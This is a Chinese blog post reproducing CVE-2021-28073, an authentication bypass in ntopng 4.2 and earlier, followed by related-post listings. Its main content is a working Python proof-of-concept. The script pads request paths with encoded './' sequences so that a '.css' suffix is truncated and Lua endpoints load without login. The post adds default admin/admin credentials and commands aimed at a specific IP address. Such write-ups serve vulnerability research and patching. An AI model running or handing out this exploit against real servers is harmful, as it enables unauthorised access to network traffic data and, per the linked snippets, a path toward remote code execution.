ntopng 权限绕过 (CVE-2021-28073)

于 2024-07-15 15:00:57 发布
阅读量199 收藏
点赞数 3
分类专栏: # 权限绕过 文章标签: 安全 安全性测试 网络 web安全
版权声明:本文为博主原创文章,遵循 CC 4.0 BY-SA 版权协议,转载请附上原文出处链接和本声明。
本文链接:https://blog.csdn.net/qq_23003811/article/details/140438634
版权

一、漏洞概述

ntopng是监控服务器网络流量的工具,对外提供Web页面。其4.2及以前的版本中存在一处权限绕过漏洞,利用该漏洞可以未授权访问目标任意接口。

二、影响范围

4.2及以前的版本

三、访问页面

四、漏洞复现

1、登录后台默认账号密码admin/admin访问任意接口,比如/lua/get_flows_data.lua能正常返回数据。

2、退出登录,访问接口会跳到登录页面

3、使用脚本

import sys

import requests

import argparse

import logging

def is_ntopng() -> bool:

    response = session.get(base_url, allow_redirects=False)

    return response.status_code == 302 and '/lua/login.lua' in response.headers.get('Location', '')

def get_base_length() -> int:

    for i in range(90, 120):

        url = base_url + '/lua/' + '%2e%2f' * i + 'as_stats.lua.css'

        response = session.get(url, allow_redirects=False)

        if response.status_code < 300:

            return 255 - 1 - i * 2 - len('as_stats.lua')

    for i in range(90, 120):

        url = base_url + '/lua/' + '%2e%2f' * i + 'get_macs_data.lua.css'

        response = session.get(url, allow_redirects=False)

        if response.status_code < 300:

            return 255 - 1 - i * 2 - len('get_macs_data.lua')

    return -1

def get_padding_length(path: str):

    padding_length = 255 - 1 - base_length - len(path)

    if padding_length % 2 == 1:

        raise RuntimeError(f'path {path} is not support')

    return int(padding_length / 2)

logging.basicConfig(stream=sys.stderr, level=logging.WARNING)

session = requests.Session()

session.headers['User-Agent'] = 'Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/87.0.4280.88 Safari/537.36'

if __name__ == '__main__':

    parser = argparse.ArgumentParser(description='CVE-2021-28073 POC for ntopng.')

    parser.add_argument('-u', '--url', help='base url for ntopng, eg: http://192.168.1.233:3000', metavar='<URL>', required=True)

    parser.add_argument('-v', '--verbose', default=False, action='store_true')

    

    subparsers = parser.add_subparsers(dest='action')

    baselength_command = subparsers.add_parser('baselength', help='get base path length of ntopng')

    generate_command = subparsers.add_parser('generate', help='generate the authenticate bypass url')

    generate_command.add_argument('-l', '--length', type=int, help='base path length of target ntopng', metavar='<LENGTH>', required=True)

    generate_command.add_argument('-p', '--path', help='lua pathname', metavar='<PATH>', required=True)

    generate_command = subparsers.add_parser('include', help='generate the arbitrary file inclusion url')

    generate_command.add_argument('-l', '--length', type=int, help='base path length of target ntopng', metavar='<LENGTH>', required=True)

    generate_command.add_argument('-i', '--include', help='path to include', metavar='<PATH>', required=True)

    args = parser.parse_args()

    if not args.action:

        parser.print_help()

        sys.exit(1)

    if args.verbose:

        logging.basicConfig(stream=sys.stderr, level=logging.DEBUG)

    base_url = args.url.rstrip('/')

    

    # check target

    if not is_ntopng():

        raise RuntimeError('No Ntopng detected')

    if args.action == 'baselength':

        base_length = get_base_length()

        sys.stdout.write(f'ntopng install path length: {base_length}\n')

    elif args.action == 'generate':

        base_length = args.length

        path = args.path

        sys.stdout.write(base_url + '/lua/' + '%2e%2f' * get_padding_length(path) + path + '.css\n')

首先,计算出ntopng lua目录的长度,使用命令:

python poc.py --url http://123.58.224.8:20379/ baselength

然后执行:

python poc.py --url http://123.58.224.8:20379/ generate -l 36 -p get_flows_data.lua

复制生成的url到一个未登录或新的浏览器中进行访问

五、漏洞利用

1、接口fuzz

风中追风-fzzf
关注
  • 3
    点赞
  • 0
    收藏
    觉得还不错? 一键收藏
  • 0
    评论
专栏目录
CVE-2021-28073 Ntopng权限绕过漏洞复现
m0_56642842的博客
08-09 478
0x00 简介 ntopng是原始ntop的下一代版本,它是一种监视网络使用情况的网络流量探测器。ntopng是基于libpcapa的,它是以一种可移植的方式编写的,以便在每个Unix平台、MacOSX和Windows上都能运行,它提供了一个直观、加密的web用户界面,用于探索实时和历史交通信息。 0x01 漏洞概述 Ntopng对外提供web页面,其4.2及其以前版本web接口的权限认证绕过,导致攻击者可以在未授权的情况下请求符合漏洞利用条件的接口,并最终利用服务器端请求伪造和高危服务实现远程代码执行。n
ntopng权限绕过CVE-2021-28073漏洞复现
玄道的网安博客
03-28 1120
简介 ntopng是一款基于Web的流量分析与集流工具。 环境搭建 https://github.com/vulhub/vulhub/tree/master/ntopng/CVE-2021-28073 执行如下命令启动ntopng docker-compose up -d 访问http://your-ip:3000将被跳转到登录页面,admin/admin进行登录 漏洞复现 Poc import sys import reques...
ntopng权限绕过漏洞CVE-2021-28073
黑白的博客
05-11 1983
声明 好好学习,天天向上 漏洞描述 ntopng是监控服务器网络流量的工具,对外提供Web页面。其4.2及以前的版本中存在一处权限绕过漏洞,利用该漏洞可以未授权访问目标任意接口。 影响范围 ntopng commit < e8b9721479f401f595c5c7bb151819aceb03ad71 复现过程 这里使用4.2版本 使用vulhub /app/vulhub/vulhub-master/ntopng/CVE-2021-28073 使用docker启动 docker-compose bu
ntopng 权限绕过与任意代码执行漏洞通告
爱国小白帽
03-25 593
报告编号:B6-2021-032401 报告来源:360CERT 报告作者:360CERT 更新日期:2021-03-24 0x01漏洞简述 2021年03月23日,360NoahLab发布了关于ntopng的风险通告,漏洞编号为CVE-2021-28073/CVE-2021-28074,漏洞等级:高危,漏洞评分:8.0。 ntopng 是一套开源的网络流量监控工具,提供基于 Web 界面的实时网络流量监控。支持跨平台,包括 Windows、Linux 以及 MacOS。ntopng 使用 C++ 语言开.
网络监控工具ntopng
weixin_33709364的博客
05-11 149
2019独角兽企业重金招聘Python工程师标准>>> ...
CVE-2021-25281:链接CVE-2021-25281和CVE-2021-25282以利用SaltStack
03-03
2021年,盐栈遭遇了两个严重的安全漏洞,分别是CVE-2021-25281和CVE-2021-25282。这两个漏洞允许攻击者在受影响的系统上执行任意代码,从而可能导致数据泄露、系统破坏或被用作进一步攻击的跳板。 **CVE-2021-...
CVE-2021-25735:利用CVE-2021-25735
05-14
利用CVE-2021-25735:Kubernetes验证准入Webhook绕过 设置脆弱的环境 让我们从运行脚本gencerts.sh开始以生成TLS证书和密钥。 bash gencerts.sh 要部署接纳控制器,您需要在本地构建Docker容器映像,使用以下命令...
CVE-2021-21975:Nmap脚本检查漏洞CVE-2021-21975
04-06
CVE-2021-21975 Nmap脚本检查漏洞CVE-2021-21975 漏洞参考: 博客 例子 nmap -p443 --script cve-2021-21975.nse --script-args vulns.showall IP
CVE-2021-28073 Ntopng权限绕过漏洞
m0_58596609的博客
01-18 1362
CVE-2021-28073 Ntopng权限绕过漏洞
Ntopng密码重置方法
04-29
Ntopng忘记密码,使用这个方法可以破解密码。本人亲测好用。
ntopng:基于Web的流量和安全网络流量监控
02-02
ntopng 介绍 ntopng:registered:是在GPLv3下发布的基于Web网络流量监视应用程序。 它是1998年编写的原始ntop的新形式,现在在性能,可用性和功能方面进行了改进。 虽然您可以在ntop网站( )上阅读有关ntopng的更多信息,但建议您开始阅读文件,以学习如何编译和使用ntopng。 如果您希望使用源代码包而不是源代码,请访问 我们为以下平台构建二进制软件包: Ubuntu Linux服务器x64 CentOS / RedHat Linux x64 Windows x64 RaspberryPI / BeagleBoard ARM(基于Ubuntu Linux) 请享用。 文献资料 如果您想了解有关ntopng的更多信息,请访问和。 细节 有关ntopng的更多信息,请访问 ntopng是在美国和欧盟的注册商标。
Linux 网络流量实时监控工具之ntopng详解
weixin_34113237的博客
12-04 198
大纲一、前言二、ntopng 简介三、ntopng 功能说明 四、ntopng 安装详解五、ntopng 配置详解 六、ntopng 使用详解注,操作系统 CentOS 5.5 X86_64,软件版本 ntopng-1.1.1。( 所以软件请在Linux公社1号FTP服务器里下载) ------------------------------------------分割线------------...
ntopng源码分析
weixin_30954607的博客
08-23 502
参数初始化以及ntop主流程启动 1 #ifndef WIN32 2 if((argc == 2) && (argv[1][0] != '-')) 3 rc = prefs->loadFromFile(argv[1]); 4 else 5 #endif //一般启动ntopng的命令: ntopng /etc/ntopng/ntopng...
ntopng依赖mysql_Centos7搭建npm网络分析工具(ntopng)
weixin_39725650的博客
01-31 183
部署的时候实在是遇到的坑太多了,必须记录一下安装依赖包安装epelyum install epel-release安装工具包yum groupinstall “Development Tools”或者(推荐):yum install subversion autoconf automake autogen libpcap-devel GeoIP-devel hiredis-devel redis ...
Ntopng权限绕过(CVE-2021-28073)
最新发布
m0_65150886的博客
01-22 1132
由于path数组长度有限,即使用户传入超过255个字符的路径,也只会写入前254个字符,我们可以通过填充./来构造一个长度超过255但是合法的路径,并利用长度限制来截断后面的.css.lua.即可绕过Ntopng的认证以访问部分Lua文件。Ntopng是基于libpcapa的,它是以一种可移植的方式编写的,以便在每个Unix平台、MacOSX和Windows上都能运行,它提供了一个直观、加密的web用户界面,用于探索实时和历史交通信息。8.访问生成的url,既可以未授权访问相关接口信息。
Linux运维工程师必备的80个监控工具全集(上)
weixin_33922672的博客
10-25 723
随着互联网行业的不断发展,各种监控工具多得不可胜数。这里列出网上最全的监控工具。让你可以拥有超过80种方式来管理你的机器。在本文中,我们主要包括以下方面:命令行工具网络相关内容系统相关的监控工具日志监控工具基础设施监控工具监控和调试性能问题是一个艰巨的任务,但用对了正确的工具有时也是很容易的。下面是一些你可能听说过的工具,也有可能没有听说过——何不赶快开始试试?八大系统监控工具1top这是一个被预...
ntopng 权限绕过(CVE-2021-28073) 漏洞复现
weixin_68999845的博客
07-31 516
如果返回状态码为302,且Location头部包含’/lua/login.lua’,则表明该URL是ntopng,返回True;请求体部分,为GET请求,/lua/后紧跟的出现大量的”.%2F“,然后跟随要访问的路径lua/xxx/lua.css,参数cookie后的tzoffset字段固定不可更改。2.浏览我们想要未经授权访问的页面或界面,如/lua/find_prefs.lua,会被重定向到登录页面。4.虽然显示404,没有该页面,但是左侧的功能点以及可以随机点击,此时越过了权限,任意的访问该网站。
nacos权限绕过漏洞(CVE-2021-29441)
10-26
nacos权限绕过漏洞(CVE-2021-29441)是指在nacos进行认证授权操作时,会判断请求的user-agent是否为"Nacos-Server",如果是的话则不进行任何认证。攻击者可以通过伪造请求头中的user-agent来绕过认证,获取到用户名...
评论
添加红包

请填写红包祝福语或标题

红包个数最小为10个

红包金额最低5元

当前余额3.43前往充值 >
需支付:10.00
成就一亿技术人!
领取后你会自动成为博主和红包主的粉丝 规则
hope_wisdom
发出的红包
实付
使用余额支付
点击重新获取
扫码支付
钱包余额 0

抵扣说明:

1.余额是钱包充值的虚拟货币,按照1:1的比例进行支付金额的抵扣。
2.余额无法直接购买下载,可以购买VIP、付费专栏及课程。

余额充值